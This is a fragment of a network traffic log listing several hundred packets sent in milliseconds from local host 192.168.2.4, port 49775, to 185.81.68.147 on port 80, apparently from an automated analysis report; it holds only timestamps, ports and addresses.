Dec 13, 2024 07:47:45.790091991 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790127993 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790158987 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790194988 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790227890 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790263891 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790293932 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790330887 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790360928 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790391922 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790422916 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790472984 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790496111 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790530920 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790558100 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790594101 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790626049 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790657043 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790690899 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790729046 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790759087 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790798903 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790831089 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790858984 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790890932 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790923119 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790951967 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.790982962 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791013002 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791050911 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791079998 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791116953 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791152954 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791188002 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791214943 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791250944 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791281939 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791325092 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791347027 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791382074 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791409969 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791441917 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791471004 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791508913 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791541100 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791572094 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791609049 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791647911 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791680098 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791716099 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791740894 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791776896 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791805983 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791840076 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791871071 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791903973 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791933060 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.791964054 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792000055 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792035103 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792069912 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792105913 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792140007 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792171001 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792203903 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792236090 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792265892 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792298079 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792332888 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792365074 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792397022 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792429924 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792462111 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792496920 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792526007 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792562962 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792597055 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792632103 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792660952 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792699099 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792732954 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792763948 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792794943 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792830944 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792860031 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792893887 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792924881 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792956114 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.792987108 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793023109 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793056011 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793108940 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793128967 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793159962 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793190002 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793224096 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793252945 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793287039 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793317080 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793351889 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793381929 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793416023 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793447971 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793486118 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793514013 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793549061 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793585062 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793618917 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793648958 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793683052 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793715000 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793750048 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793780088 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793812990 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793843985 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793883085 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793917894 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793947935 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.793982983 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794015884 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794047117 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794084072 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794117928 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794172049 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794208050 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794240952 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794275045 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794311047 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794344902 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794373989 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794405937 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794436932 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794469118 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794498920 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794538975 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794567108 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794600964 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794635057 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794670105 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794702053 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794738054 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794766903 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794799089 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794831038 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794862032 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794893026 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794925928 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794955015 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.794987917 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795018911 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795054913 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795085907 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795121908 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795154095 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795186043 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795219898 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795252085 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795279980 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795320034 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795339108 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795377016 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795406103 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795437098 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795466900 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795500994 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795531988 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795567989 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795599937 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795634985 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795664072 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795695066 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795727015 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795758963 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795787096 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795823097 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795850992 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795883894 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795913935 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795944929 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.795975924 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796013117 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796041965 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796076059 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796108007 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796139956 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796169043 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796200037 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796230078 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796261072 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796291113 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796322107 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796353102 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796385050 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796413898 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796449900 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796483994 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796514988 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796545029 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796578884 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796607971 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796639919 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796668053 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796700001 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796731949 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796762943 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796792984 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796824932 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796859026 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796888113 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796926022 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796957970 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.796993017 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797025919 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797058105 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797087908 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797121048 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797151089 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797183037 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797214031 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797245026 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797275066 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797307014 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797338963 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797378063 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797410011 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797441959 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797471046 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797502041 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797533035 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797564030 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797594070 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797626019 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797656059 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797687054 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797715902 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797748089 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797780991 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797813892 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797849894 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797885895 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797915936 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797954082 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.797977924 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798010111 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798041105 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798074007 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798104048 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798135042 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798163891 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798196077 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798228025 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798263073 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798295975 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798331976 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798362017 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798397064 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798425913 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798458099 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798486948 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798517942 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798546076 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798578024 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798608065 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798639059 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798667908 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798702955 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798738003 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798770905 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798799038 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798835993 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798867941 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798898935 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798929930 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798960924 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.798991919 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799024105 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799052000 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799083948 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799115896 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799149990 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799180984 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799211025 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799242973 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799278021 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799309969 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799341917 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799371958 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799403906 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799433947 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799464941 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799494028 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799526930 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799556971 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799591064 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799622059 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799657106 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799685001 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799716949 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799748898 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799778938 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799812078 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799841881 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799876928 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799905062 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.799936056 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.800535917 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.800590992 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.800648928 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.800662994 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.800683022 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.800712109 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.800735950 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.800765038 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.800787926 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.800817013 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.800883055 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.800910950 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.800910950 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.800910950 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.800940990 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.800962925 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.800991058 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.801013947 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.801042080 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.801064014 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.801090002 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.801119089 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.801141024 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.801168919 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.801189899 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.801218987 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.801239967 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.801266909 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.801291943 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.801320076 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.801347017 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.801933050 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.801945925 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.801945925 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.801959038 CET	49775	80	192.168.2.4	185.81.68.147
